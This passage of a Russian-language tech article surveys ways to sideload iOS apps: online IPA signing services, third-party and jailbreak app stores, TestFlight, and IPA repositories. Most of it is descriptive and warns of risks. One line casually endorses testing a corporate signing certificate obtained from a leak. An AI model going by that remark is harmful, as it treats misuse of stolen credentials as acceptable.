p12 для подписи­ , пароль и файл provisioning. Сервис­ выдаст QR-код, отска ­ нировав­ который на iPhone можно­ установить­ подписан­ ­ный IPA без связи­ с компьюте­ ­ром. Если ты собираешь­ ­ся восполь­ ­зовать­ся своим­ собствен­ ­ным сертифика­ ­том — дважды­ подумай, стоит­ ли доверять аноним­ ­ному сервису­ . Впрочем­ , если к тебе в руки попал корпоратив­ ­ный сертификат­ из утечки­ и ты хочешь протес­ ­тировать его работу — вопросов­ не возника­ ­ет.

Как это реализова­ но­ ? С большой­ вероятностью­ за кулисами­ спрятан­ компьютер­ с macOS и Xcode, к которому­ прикручен­ веб интерфейс. Детали реализации­ неизвес­ тны­ .

IPAWind — еще один подобный­ сервис­ . Позволя­ ­ет подписывать­ пакеты не только­ своим­ сертифика­ ­том, но и их собствен­ ­ным (такой сертификат­ может быть аннулиро­ ­ван в любой момент, зато твой аккаунт­ останет­ ­ся вне подозрений­ ). Как бонус: возможность­ редактировать­ манифест, благода­ ря­

чему можно­ устанав­ ливать­ дубликат­ приложе­ ния­ (например­ , иметь на iPhone два WhatsApp), а также­ включать­ опцию iTunes Sharing, которая сделает­ рабочие файлы­ приложе­ ния­ доступны­ ми­ через iTunes.

АЛЬТЕРНАТИВНЫЕ МАГАЗИНЫ ПРИЛОЖЕНИЙ

Выше­ были описаны­ штатные­ способы­ установить­ приложе­ ние­ на устройство­ ; в худшем­ случае­ мы вступали­ на территорию­ «серой зоны». Способы­ , описан­ ­ ные далее, в явном виде нарушают­ политики­ Apple и в некоторых­ случаях­ могут нарушать права­ других­ правооб­ ладате­ лей­ .

Первый­ такой вариант­ — сторон­ ­ние магазины­ приложе­ ­ний. Все подобные­ решения характеризу­ ­ются простотой­ установ­ ­ки и использования­ (открыл страницу­ магазина­ в Safari, нажал кнопку­ , получил на устройство­ альтер­ ­натив ­ ный магазин приложе­ ­ний, подтвер­ ­дил сертификат­ — и можно­ работать). Есть как платные­ , так и бесплат­ ­ные варианты­ . Самые известные­ из них:

•Ignition — специали­ ­зиру­ется на утилитах­ джейлбрей­ ­ка, твиках­ и патченных­ приложе­ ­ниях;

•TweakBox — содержит­ в каталоге­ утилиты­ , эмулято­ ­ры, джейлбрей­ ­ки и мно ­ гое другое­ (каталог­ );

•iPASTORE — платный­ (подписка­ ) сторон­ ­ний магазин приложе­ ­ний.

Этими­ тремя­ список­ подобных­ сервисов­ не ограничи­ вает­ ся­ . AppValley, CokernutX, Panda Helper, платный­ AppDB, TweakDoor, Emus4u, iPABox, Zestia…

Не все пережили­ выход iOS 14, но многие­ продол­ жают­ работать и поныне. Все эти магазины­ , включая­ платные­ сервисы­ , функци­ они­ руют­ с наруше ­

нием политики­ Apple: нецелевое­ использование­ сертифика­ ­тов разработ­ ­ чиков, использование­ «утекших­ » или специаль­ ­но купленных­ корпоратив­ ­ных сертифика­ ­тов и соответс­ ­тву­ющих механизмов­ доставки­ . Apple регулярно­ блокиру­ ­ет такие сертифика­ ­ты, но сервисы­ всегда­ находят замену и перепод ­ писывают­ как само приложе­ ­ние магазин, так и установ­ ­ленные с его помощью утилиты­ . Вот что пишет об этом сам сервис­ .

Какие­ риски­ возможны­ при использовании­ подобных­ сервисов­ ? Отоз ­ ванный Apple сертификат­ может привес­ ­ти к невозможнос­ ­ти запустить­ уста ­ новленное­ приложе­ ­ние. Техничес­ ­кая возможность­ модифициро­ ­вать (патчить­ ) приложе­ ­ния на стороне­ сервиса­ означает­ вероятность­ получить вместе­ с установ­ ­ленной программой­ неприят­ ­ный «довесок», который (в случае­ ста ­ рых версий­ iOS) может даже взломать­ устройство­ .

Пользовать­ ­ся подобными­ магазинами­ или нет — решать тебе.

Для взломан­ ных­ устройств­ доступно­ несколь­ ко­ магазинов­ приложе­ ний­ : Cydia, Sileo, Zebra, Installer 5. Какой­ из них выбрать­ ? У разработ­ чиков­ утилит­ для джейлбрей­ ка­ , как правило­ , есть свой «любимый» магазин приложе­ ний­ , который и будет установ­ лен­ на устройство­ после­ взлома­ . При этом ты всегда­ можешь параллель­ но­ установить­ дополнитель­ ный­ магазин приложе­ ний­ .

На взломан­ ­ных устройствах­ нет ограниче­ ­ний, связан­ ­ных с использовани­ ­ ем персональ­ ­ных профилей­ . Можно­ устанав­ ­ливать любое количество­ при ­ ложений­ ; не будет и ограниче­ ­ний по времени­ работы.

TESTFLIGHT

TestFlight — это сервис­ тестирова­ ­ния iOS-приложе­ ­ний и одноимен­ ­ное при ­ ложение­ , которое пользователь­ может установить­ на свое устройство­ . С тех ­ нической­ точки­ зрения­ TestFlight упрощает­ дистри­ ­буцию тестовых­ сборок­ , облегчая процесс­ сбора­ кодов тестовых­ устройств­ (UDID) и позволяя­ рас ­ пространять­ сборки­ среди­ зарегистри­ ­рован­ных участни­ ­ков тестирова­ ­ния. До бесконеч­ ­ности тестовыми­ сборками­ пользовать­ ­ся нельзя­ ; рано или поз ­ дно сертификат­ истекает­ , и пользовате­ ­лю приходит­ ­ся или обновляться­ на официаль­ ­ную версию­ приложе­ ­ния, или устанав­ ­ливать свежую­ тестовую­ сборку­ , которую предос­ ­тавит разработ­ ­чик.

Сервисом­ TestFlight могут восполь­ зовать­ ся­ как корпоратив­ ные­ , так и час ­ тные разработ­ чики­ . В последнем­ случае­ будет ограниче­ ние­ на максималь­ ное­ число­ участни­ ков­ бета тестирова­ ния­ — не более 100 UDID в год. Удаление­ UDID из программы­ не освобож­ дает­ слот.

Некото­ ­рые разработ­ ­чики пользуют­ ­ся этим сервисом­ для дистри­ ­буции ПО, которое по тем или иным причинам­ не принима­ ­ют в App Store. Самый извес ­ тный пример­ такого приложе­ ­ния — Soap4me для платформы­ iOS, которое находится­ в состоянии­ перманен­ ­тно­го бета тестирова­ ­ния. В принципе­ , впол ­ не себе решение — но для обычного­ пользовате­ ­ля избыточ­ ­но сложное­ .

Навер­ ное­ , самый известный­ репозиторий­ пакетов IPA — iOS Ninja. С сайта­ можно­ скачать­ как сами пакеты приложе­ ний­ , так и образы­ прошивок­ Apple для ряда устройств­ (по прямым­ ссылкам­ с сайта­ Apple). Скачан­ ные­ с сайта­ пакеты для установ­ ки­ на iPhone потребу­ ется­ подписать­ одним из описан­ ных­ выше способов­ .

ЗАКЛЮЧЕНИЕ

«Плати­ или страдай­ » — такой вывод можно­ сделать­

из этой статьи. Действи­

­

тельно­ , оплатив­

участие­

в программе­

для разработ­

чиков­

,

можно­

забыть

о сомнитель­

ных­

(часто­ также­ небесплат­

ных­ ) сервисах­

и связан­ ных­

с ними

рисках­ . Впрочем­ , не факт, что в программе­

Apple для разработ­

чиков­

вообще­

удастся­ зарегистри­ ровать­

ся­ ; в последнее­

время­ это стало­ непросто­

. Бес ­

платная­ альтер­ натива­

— AltStore — требует­

серьезных­

усилий­

для установ­ ки­

и настрой­

ки­ , а также­ постоян­

ной­

возни­ с переподписыва­

нием­

установ­ ленных­

приложе­

ний­ , для

автомати­

зации­

которой нужна­ постоян­

но­ работающая­

на компьюте­ ре­ серверная­

часть. Установ­ ка­ джейлбрей­

ка­ — универ­ саль­

ное­

решение, лишающее­

, впрочем­ , одного­ из основных преиму­ ществ­

iOS — дос ­

тупа к регулярным­

обновлениям­

. Каким из этих способов­

восполь­

зовать­

ся­

и стоит­ ли овчинка выделки­ ? Решать, как водится­ , тебе.